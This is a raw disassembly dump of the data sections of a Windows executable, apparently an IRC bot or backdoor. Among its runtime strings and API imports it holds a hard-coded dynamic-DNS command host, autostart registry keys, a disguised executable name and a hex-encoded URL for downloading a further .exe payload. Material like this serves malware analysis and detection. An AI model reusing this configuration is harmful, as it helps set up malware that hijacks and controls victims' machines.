dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_43D094�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_43D090�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: .data:off_43D30C�o
dbl_427860 dq 0.0 ; DATA XREF: __handle_exc+8C�r
; __handle_exc+AC�r ...
dbl_427868 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_427870 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 10h
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe+93�o
align 4
dword_4278A8 dd 0FFFFFFFFh, 422964h, 42296Eh, 0 ; DATA XREF: ___FrameUnwindToState+5�o
dword_4278B8 dd 0FFFFFFFFh, 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+5�o
dd offset sub_422AEA
align 8
dd offset sub_422AC8
dd offset sub_422AD2
dword_4278D0 dd 0FFFFFFFFh, 422D1Ah, 422D1Eh, 0
; DATA XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+5�o
dword_4278E0 dd 0FFFFFFFFh, 422D7Ch, 422D85h, 0 ; DATA XREF: unknown_libname_5+5�o
dword_4278F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_422DFC+5�o
dd offset loc_422E4D
align 10h
dd offset loc_422E39
dd offset loc_422E3D
dword_427908 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_422E52+5�o
dd offset loc_422EA3
align 8
dd offset loc_422E8F
dd offset loc_422E93
dword_427920 dd 2 dup(0) ; DATA XREF: ___crtLCMapStringA+36�o
; ___crtGetStringTypeA+39�o ...
dword_427928 dd 0FFFFFFFFh, 4233B8h, 4233BCh, 0FFFFFFFFh, 42346Ch, 423470h
; DATA XREF: ___crtLCMapStringA+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 10h
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 10h
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_43D4DC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 10h
; char asc_427BF0[]
asc_427BF0 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 10h
dword_427C30 dd 0FFFFFFFFh, 4245EDh, 4245F1h ; DATA XREF: ___crtGetStringTypeA+5�o
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_425A68�o
align 4
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+C7�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+AD�o
align 4
dd offset dword_427DAC
off_427C90 dd offset sub_4260E2 ; DATA XREF: sub_4260BA+8�o
; sub_4260FE+2C�o ...
dd offset sub_4260D5 ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset sub_4262F6
dd offset dword_427DF8
off_427CA0 dd offset sub_42614C ; DATA XREF: sub_4260FE+3A�o
; sub_426168�o ...
dd offset sub_4260D5 ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset loc_426332
dword_427CAC dd 0 ; DATA XREF: sub_4260FE+16�o
; sub_4261D0+16�o
; char aInvalidStringP[]
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_426173+11�o
dd offset dword_427E44
off_427CCC dd offset sub_42625B ; DATA XREF: sub_426277�o
; sub_42629A+37�o ...
dd offset sub_4260D5 ; ?what@runtime_error@@UBEPBDXZ
; doubtful name
dd offset loc_426314
; char aStringTooLong[]
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42629A+11�o
dd offset dword_427E88
off_427CEC dd offset ??_Gtype_info@@UAEPAXI@Z ; DATA XREF: type_info::~type_info(void)�o
; .data:off_43DAE4�o ...
; type_info::`scalar deleting destructor'(uint)
dd offset dword_427EB8
off_427CF4 dd offset sub_4264C1 ; DATA XREF: exception::exception(char const * const &)+8�o
; exception::exception(exception const &)+8�o ...
dd offset unknown_libname_10 ; Microsoft VisualC 2-8/net runtime
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: unknown_libname_10+7�o
align 10h
dword_427D10 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: _CxxThrowException(x,x)+E�o
dd 3, 19930520h, 2 dup(0)
dword_427D30 dd 0FFFFFFFFh, 426738h, 42673Ch, 0FFFFFFFFh, 4267B5h, 4267B9h
; DATA XREF: ___crtLCMapStringW+5�o
dword_427D48 dd 0FFFFFFFFh, 4269ADh, 4269B1h, 0FFFFFFFFh, 426A0Ah, 426A0Eh
; DATA XREF: ___crtGetStringTypeW+5�o
dd 43DAE4h, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_427D78 dd offset off_43DAFC ; DATA XREF: .rdata:00427D90�o
; .rdata:00427DDC�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427D78
dd offset dword_427D48+18h
dword_427D98 dd 3 dup(0) ; DATA XREF: .rdata:00427DBC�o
dd 2, 427D90h
dword_427DAC dd 3 dup(0) ; DATA XREF: .rdata:00427C8C�o
dd offset off_43DAFC
dd offset dword_427D98+4
off_427DC0 dd offset off_43DB1C ; DATA XREF: .rdata:00427DD8�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427DC0
dd offset off_427D78
dd offset dword_427D48+18h
dd 0
db 0 ; DATA XREF: .rdata:00427E08�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3, 427DD8h
dword_427DF8 dd 3 dup(0) ; DATA XREF: .rdata:00427C9C�o
dd offset off_43DB1C
dd offset unk_427DE8
off_427E0C dd offset off_43DB3C ; DATA XREF: .rdata:00427E24�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E0C
dd offset off_427D78
dd offset dword_427D48+18h
dword_427E30 dd 3 dup(0) ; DATA XREF: .rdata:00427E54�o
dd 3, 427E24h
dword_427E44 dd 3 dup(0) ; DATA XREF: .rdata:00427CC8�o
dd offset off_43DB3C
dd offset dword_427E30+4
off_427E58 dd offset off_43DB60 ; DATA XREF: .rdata:00427E70�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_427E58
dd 0
db 0 ; DATA XREF: .rdata:00427E98�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 427E70h
dword_427E88 dd 3 dup(0) ; DATA XREF: .rdata:00427CE8�o
dd offset off_43DB60
dd offset unk_427E78
dd offset dword_427D48+18h
dword_427EA0 dd 4 dup(0) ; DATA XREF: .rdata:00427EC8�o
dd 1, 427E9Ch
dword_427EB8 dd 3 dup(0) ; DATA XREF: .rdata:00427CF0�o
dd offset off_43DAE4
dd offset dword_427EA0+8
align 10h
stru_427ED0 dd 19930520h ; Magic ; DATA XREF: .text:loc_426AA7�o
dd 2 ; Count
dd offset stru_427ED0.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_426A90 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_426A88 ; Info.Proc
stru_427F00 dd 19930520h ; Magic ; DATA XREF: sub_426AC4�o
dd 2 ; Count
dd offset stru_427F00.Info; InfoPtr
dd 0 ; CountDtr
dd 0 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd offset sub_426AB4 ; Info.Proc
dd 0 ; Info.Id
dd offset sub_426ABC ; Info.Proc
stru_427F30 dd 19930520h ; Magic ; DATA XREF: sub_426AD0�o
dd 2 ; Count
dd offset stru_427F30.Info; InfoPtr
dd 1 ; CountDtr
dd offset stru_427F60 ; DtrPtr
dd 3 dup(0) ; _unk
dd -1 ; Info.Id
dd 0 ; Info.Proc
dd -1 ; Info.Id
dd 0 ; Info.Proc
stru_427F60 dd 0, 0, 1 ; _unk ; DATA XREF: .rdata:stru_427F30�o
dd 1 ; Count
dd offset stru_427F78 ; RttiBlkPtr
dd 0
stru_427F78 _msRttiDscr <0, 0, 0, offset loc_40DA8E> ; DATA XREF: .rdata:stru_427F60�o
stru_427F88 _msExcInfo <-1, offset sub_426ADA> ; DATA XREF: .rdata:stru_427F90�o
stru_427F90 _msExcept7 <19930520h, 1, offset stru_427F88, 0, 0, 0>
; DATA XREF: .text:loc_426AE2�o
align 10h
dd offset off_43DAE4
align 8
dd 0FFFFFFFFh, 0
dd 0Ch, 42651Ah, 0
dd offset off_43DAFC
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 426218h, 0
dd offset off_43DB1C
align 10h
dd 0FFFFFFFFh, 0
dword_427FF8 dd 1Ch, 426282h, 3, 427FE4h, 427FC8h, 427FACh ; DATA XREF: .rdata:0042801C�o
dword_428010 dd 0 ; DATA XREF: sub_426173+2E�o
; sub_4262F6+4B�o
dd offset sub_426168
dd 0
dd offset dword_427FF8+8
stru_428020 _msExcInfo <-1, offset sub_426AEC> ; DATA XREF: .rdata:stru_428028�o
stru_428028 _msExcept7 <19930520h, 1, offset stru_428020, 0, 0, 0>
; DATA XREF: .text:loc_426AF4�o
stru_428044 _msExcInfo <-1, offset sub_426AFE> ; DATA XREF: .rdata:stru_42804C�o
stru_42804C _msExcept7 <19930520h, 1, offset stru_428044, 0, 0, 0>
; DATA XREF: .text:loc_426B06�o
stru_428068 _msExcInfo <-1, offset sub_426B10> ; DATA XREF: .rdata:stru_428070�o
stru_428070 _msExcept7 <19930520h, 1, offset stru_428068, 0, 0, 0>
; DATA XREF: .text:loc_426B18�o
align 10h
dd offset off_43DB3C
align 8
dd 0FFFFFFFFh, 0
dword_4280A0 dd 1Ch, 4262DEh, 3, 42808Ch, 427FC8h, 427FACh ; DATA XREF: .rdata:004280C4�o
dword_4280B8 dd 0 ; DATA XREF: sub_42629A+2E�o
; sub_4262F6+2D�o
dd offset sub_426277
dd 0
dd offset dword_4280A0+8
stru_4280C8 _msExcInfo <-1, offset sub_426B22> ; DATA XREF: .rdata:stru_4280D0�o
stru_4280D0 _msExcept7 <19930520h, 1, offset stru_4280C8, 0, 0, 0>
; DATA XREF: .text:loc_426B2A�o
dword_4280EC dd 2, 427FC8h, 427FACh ; DATA XREF: .rdata:00428104�o
dword_4280F8 dd 0 ; DATA XREF: sub_4262F6+F�o
dd offset sub_4260BA
dd 0
dd offset dword_4280EC
dd 28308h, 2 dup(0)
dd 2836Eh, 271C4h, 28144h, 2 dup(0)
dd 28B82h, 27000h, 5 dup(0)
dd 2868Ah, 28B72h, 28B62h, 28B52h, 28B34h, 28B22h, 28B10h
dd 28AFCh, 28AECh, 28ADEh, 28ACEh, 28ABCh, 28AA2h, 28A8Ah
dd 28A70h, 28A56h, 28A3Ah, 28A2Ah, 28A1Ah, 28A0Eh, 289FCh
dd 289F0h, 289E6h, 289DAh, 289CAh, 289BAh, 289ACh, 28386h
dd 28394h, 283A2h, 283B4h, 283CAh, 283E0h, 283E8h, 283F8h
dd 28406h, 28414h, 2842Ah, 2843Ah, 28446h, 2845Ch, 28472h
dd 28486h, 2849Ch, 284ACh, 284BCh, 284CEh, 284DEh, 284EAh
dd 284FAh, 2850Ch, 28520h, 28532h, 28542h, 28550h, 28568h
dd 28580h, 285A8h, 285C0h, 285D6h, 285E2h, 285EEh, 28602h
dd 28610h, 28624h, 28636h, 2864Ah, 28658h, 2866Ah, 2867Ch
dd 28696h, 286AEh, 286C8h, 286D8h, 286EAh, 286FCh, 28714h
dd 2872Eh, 2874Ah, 28764h, 28780h, 28790h, 2879Eh, 287B8h
dd 287C4h, 287D0h, 287E2h, 287F4h, 28808h, 28818h, 2882Ah
dd 2883Ah, 28848h, 2885Ah, 2886Ah, 28880h, 2888Eh, 2889Ch
dd 288B8h, 288CEh, 288DAh, 288F0h, 28900h, 28914h, 2892Ah
dd 28938h, 28944h, 28956h, 28968h, 28976h, 28990h, 2899Eh
dd 0
dd 28360h, 80000007h, 8000000Fh, 8000000Ch, 80000074h
dd 80000073h, 80000015h, 8000000Ah, 80000002h, 8000000Dh
dd 80000001h, 8000000Bh, 80000009h, 80000004h, 80000010h
dd 80000003h, 80000017h, 80000013h, 80000012h, 80000097h
dd 80000006h, 0
db 41h ; A
align 2
aWsasocketa_0 db 'WSASocketA',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
aVersion_dll db 'VERSION.dll',0
db '¹',0
aExitprocess db 'ExitProcess',0
a4 db '4',0
aClosehandle db 'CloseHandle',0
aF_2 db 'f',0
aCreateprocessa db 'CreateProcessA',0
align 4
db 7Dh ; }
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 56h ; V
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 6Fh ; o
align 2
aCreatethread db 'CreateThread',0
align 4
aG db 'ƒ',0
aDeletefilea db 'DeleteFileA',0
dw 286h
aOpenprocess db 'OpenProcess',0
db 43h ; C
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 171h
aGetlasterror db 'GetLastError',0
align 2
aC_2 db 'C',0
aCopyfilea db 'CopyFileA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 5Eh ; ^
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 17Fh
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 390h
aWaitforsingleo db 'WaitForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 0DFh ; ß
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Fh ; _
db 3, 54h, 65h
aRminatethread db 'rminateThread',0
dw 1D5h
aGettemppatha db 'GetTempPathA',0
align 2
dw 26Eh
aMovefilea db 'MoveFileA',0
dw 252h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 1A0h
aGetprocaddress db 'GetProcAddress',0
align 4
db 14h
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 10h
db 74h ; t
db 1, 47h, 65h
aTlocaleinfoa db 'tLocaleInfoA',0
align 2
dw 1E9h
aGetversionexa db 'GetVersionExA',0
db 'º',0
aExitthread db 'ExitThread',0
align 10h
db 51h ; Q
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aS_7 db '˜',0
aEntercriticals db 'EnterCriticalSection',0
align 10h
db 24h ; $
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritical db 'DeleteCriticalSection',0
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 2B5h
aReadfile_0 db 'ReadFile',0
align 2
dw 3A4h
aWritefile db 'WriteFile',0
dw 368h
aTransactnamedp db 'TransactNamedPipe',0
aS_8 db 'S',0
aCreatefilea db 'CreateFileA',0
dd 6554035Eh, 6E696D72h, 50657461h, 65636F72h, 7373h, 75440093h
dd 63696C70h, 48657461h, 6C646E61h, 1420065h
aGetcurrentproc db 'GetCurrentProcess',0
aE_0 db 'e',0
aCreatepipe db 'CreatePipe',0
align 4
dd 654701E0h, 6D695474h, 726F4665h, 4174616Dh, 1470000h
dd 44746547h, 46657461h, 616D726Fh, 4174h, 65470163h, 6C694674h
dd 7A695365h, 0CE0065h, 646E6946h, 736F6C43h, 0C50065h
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db 'Ä',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ü',0
aFindnextfilea db 'FindNextFileA',0
db 'Ò',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepointer db 'SetFilePointer',0
align 4
db 0EEh ; î
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 8Eh ; Ž
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 2A3h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 0A4h ; ¤
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
dd 65470173h, 636F4C74h, 69546C61h, 656Dh, 724600F8h, 694C6565h
dd 72617262h, 1590079h
aGetenvironment db 'GetEnvironmentVariableW',0
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 4
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 0A3h ; £
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 389h
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 0B8h ; ¸
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701C5h, 73795374h, 496D6574h, 6F666Eh, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilemapp db 'CreateFileMappingA',0
align 10h
db 1Fh
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 165h
aGetfiletime db 'GetFileTime',0
db '¼',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 94h ; ”
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 3C3h
aLstrcmpia db 'lstrcmpiA',0
dw 15Ah
aGetexitcodepro db 'GetExitCodeProcess',0
align 10h
db 91h ; ‘
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
db 78h ; x
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
dw 21Ah
aHeaprealloc db 'HeapReAlloc',0
dd 745202D7h, 776E556Ch, 646E69h, 654701B7h, 61745374h
dd 70757472h, 6F666E49h, 1100041h, 43746547h, 616D6D6Fh
dd 694C646Eh, 41656Eh, 654701E8h, 72655674h, 6E6F6973h
dd 1580000h
aGetenvironme_0 db 'GetEnvironmentVariableA',0
dd 65480214h, 65447061h, 6F727473h, 2120079h, 70616548h
dd 61657243h, 6574h, 69560383h, 61757472h, 6572466Ch, 3810065h
dd 74726956h, 416C6175h, 636F6C6Ch, 2360000h, 61427349h
dd 69725764h, 74506574h, 1040072h, 43746547h, 666E4950h
dd 0FD006Fh, 41746547h, 5043h, 65470193h, 4D454F74h, 5043h
dd 615202A7h, 45657369h, 70656378h, 6E6F6974h, 21C0000h
dd 70616548h, 657A6953h, 2440000h, 614D434Ch, 72745370h
dd 41676E69h, 2450000h, 614D434Ch, 72745370h, 57676E69h
dd 36E0000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
dw 0F6h
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 0F7h ; ÷
align 2
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 155h
aGetenvironme_1 db 'GetEnvironmentStrings',0
dw 157h
aGetenvironme_2 db 'GetEnvironmentStringsW',0
align 4
db 24h ; $
db 3, 53h, 65h
aThandlecount db 'tHandleCount',0
align 2
dw 1B9h
aGetstdhandle db 'GetStdHandle',0
align 2
dw 166h
aGetfiletype db 'GetFileType',0
db 37h ; 7
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
aU_0 db 'î',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 0BAh ; º
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 4Ah ; J
db 3, 53h, 65h
aTunhandledexce db 'tUnhandledExceptionFilter',0
dw 233h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 230h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 310h
aSetendoffile db 'SetEndOfFile',0
align 2
aKernel32_dll_0 db 'KERNEL32.dll',0
align 10h
_rdata ends
; Section 3. (virtual address 00029000)
; Virtual size : 000B43A0 ( 738208.)
; Section size in file : 000B43A0 ( 738208.)
; Offset to raw data for section: 00029000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 429000h
dword_429000 dd 0 ; DATA XREF: __cinit+1F�o
dd offset loc_401205
dd offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
dd offset sub_40F0EC
dword_429010 dd 0 ; DATA XREF: __cinit+1A�o
dword_429014 dd 0 ; DATA XREF: __cinit+10�o
dd offset ___onexitinit
dd offset ___initmbctable
dd offset ___initstdio
dd offset sub_424F62
dword_429028 dd 0 ; DATA XREF: __cinit:loc_41C16F�o
dword_42902C dd 0 ; DATA XREF: _doexit+65�o
dd offset ___endstdio
dword_429034 dd 0 ; DATA XREF: _doexit:loc_41C213�o
dword_429038 dd 0 ; DATA XREF: _doexit+76�o
dd offset sub_424F73
dword_429040 dd 4 dup(0) ; DATA XREF: _doexit:loc_41C224�o
dword_429050 dd 80000002h, 429170h, 80000002h, 4291A0h, 80000001h, 429170h
; DATA XREF: sub_401000+7�o
; char aRb[]
aRb db 'rb',0 ; DATA XREF: sub_401000+63�o
; sub_4010AB+B�o ...
align 4
dword_42906C dd 1B58h ; DATA XREF: WinMain(x,x,x,x)+4A4�r
; WinMain(x,x,x,x)+539�r
dword_429070 dd 0C8Bh ; DATA XREF: WinMain(x,x,x,x)+585�r
dword_429074 dd 7E4h ; DATA XREF: sub_401ACD:loc_4045D8�r
dword_429078 dd 45h ; DATA XREF: sub_401ACD+202E�r
; sub_40BD91+3B�r
dword_42907C dd 7D1h ; DATA XREF: sub_401ACD:loc_403BE9�r
; sub_40BD91:loc_40C182�r
dword_429080 dd 201h ; DATA XREF: sub_401ACD:loc_403D75�r
word_429084 dw 7C7h ; DATA XREF: sub_401ACD:loc_4046FB�r
align 4
dword_429088 dd 1 ; DATA XREF: sub_401ACD+643�r
dword_42908C dd 1 ; DATA XREF: WinMain(x,x,x,x)+13D�r
dword_429090 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_401562�r
; sub_4188A6+C�r
byte_429094 db 2Eh ; DATA XREF: sub_401ACD+A76�r
; sub_401ACD+B30�r ...
align 4
dword_429098 dd 0Ah ; DATA XREF: sub_40AAAC+3A�r
; sub_40AAAC+60�r ...
; int dword_42909C
dword_42909C dd 4 ; DATA XREF: sub_4017ED+78�r
; sub_401ACD+279�r ...
; int dword_4290A0
dword_4290A0 dd 1 ; DATA XREF: sub_4017ED+72�r
; sub_401ACD+273�r
; char aSbrti[]
aSbrti db 'sbrti',0 ; DATA XREF: WinMain(x,x,x,x)+5D�o
; sub_401ACD:loc_40445D�o ...
align 4
aAbosel7V4 db 'abosel7 v4',0 ; DATA XREF: sub_401ACD:loc_404902�o
align 4
; char aCool[]
aCool db 'cool',0 ; DATA XREF: sub_401ACD+7BCB�o
; sub_401ACD+7C9A�o
align 10h
; char Source[]
Source db 'scorti1.dns2go.com',0 ; DATA XREF: WinMain(x,x,x,x)+490�o
; WinMain(x,x,x,x)+52A�o
align 4
; char aFaak[]
aFaak db '#FAAK#',0 ; DATA XREF: WinMain(x,x,x,x)+4B0�o
; WinMain(x,x,x,x)+540�o ...
align 4
; char aSaad_[]
aSaad_ db 'saad.',0 ; DATA XREF: WinMain(x,x,x,x)+4C7�o
; WinMain(x,x,x,x)+552�o
align 4
; char byte_4290E4
byte_4290E4 db 73h ; DATA XREF: WinMain(x,x,x,x):loc_401789�r
; WinMain(x,x,x,x)+576�o
aCorti1_dns2go_ db 'corti1.dns2go.com',0
align 4
; char aFaak_0[]
aFaak_0 db '#FAAK#',0 ; DATA XREF: WinMain(x,x,x,x)+58C�o
align 10h
; char aSaad__0[]
aSaad__0 db 'saad.',0 ; DATA XREF: WinMain(x,x,x,x)+59E�o
align 4
; char Str[]
Str db 'fgezpzzi.exe',0 ; DATA XREF: WinMain(x,x,x,x)+143�o
; WinMain(x,x,x,x)+167�w ...
align 4
aWinnt_bat db 'winnt.bat',0
align 4
aWindosSeresAgn db 'Windos Seres Agnts',0 ; DATA XREF: sub_401000+E�o
align 4
asc_429138: ; DATA XREF: .text:0040AB2B�o
unicode 0, <->,0
aWinsys_dat db 'winsys.dat',0
align 4
aXI db '-x+i',0 ; DATA XREF: sub_401ACD+7D1D�o
align 10h
; char aF[]
aF db '#f',0 ; DATA XREF: sub_401ACD+1E91�o
; sub_401ACD+1EA2�o ...
align 4
; char aF_0[]
aF_0 db '#f',0 ; DATA XREF: sub_401ACD+72B4�o
; sub_401ACD+730C�o
align 4
; char aF_1[]
aF_1 db '#f',0 ; DATA XREF: sub_401ACD+40EA�o
; sub_401ACD+423A�o
align 4
off_42915C dd offset a@admin_com ; DATA XREF: sub_401ACD:loc_4096EB�o
; "*@admin.com"
off_429160 dd offset aMircV6_16Khale ; DATA XREF: sub_401ACD+8A7�r
; sub_401ACD+7C3A�o
; "mIRC v6.16 Khaled Mardam-Bey"
dd offset aMircV6_17Khale ; "mIRC v6.17 Khaled Mardam-Bey"
dd offset aMircV6_20Khale ; "mIRC v6.20 Khaled Mardam-Bey"
dd offset aMircV6_21Khale ; "mIRC v6.21 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 10h
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_41A3C6+28�o
; sub_41A6EA+28�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_41A3C6+D4�o
; sub_41A6EA+D4�o
align 4
dd 2 dup(1), 70747468h, 772F2F3Ah, 662E7777h, 77656572h
dd 6F746265h, 632E6E77h, 7A2F6D6Fh, 2F737678h, 73636E76h
dd 652E6D79h, 6578h, 429938h, 429928h, 429918h, 42990Ch
dd 429904h, 4298FCh, 4298F4h, 4298ECh, 4298E0h, 4298D8h
dd 4298D0h, 4298C8h, 4298BCh, 4298B4h, 4298ACh, 4298A0h
dd 42989Ch, 429894h, 429890h, 0
dd offset byte_43DB88
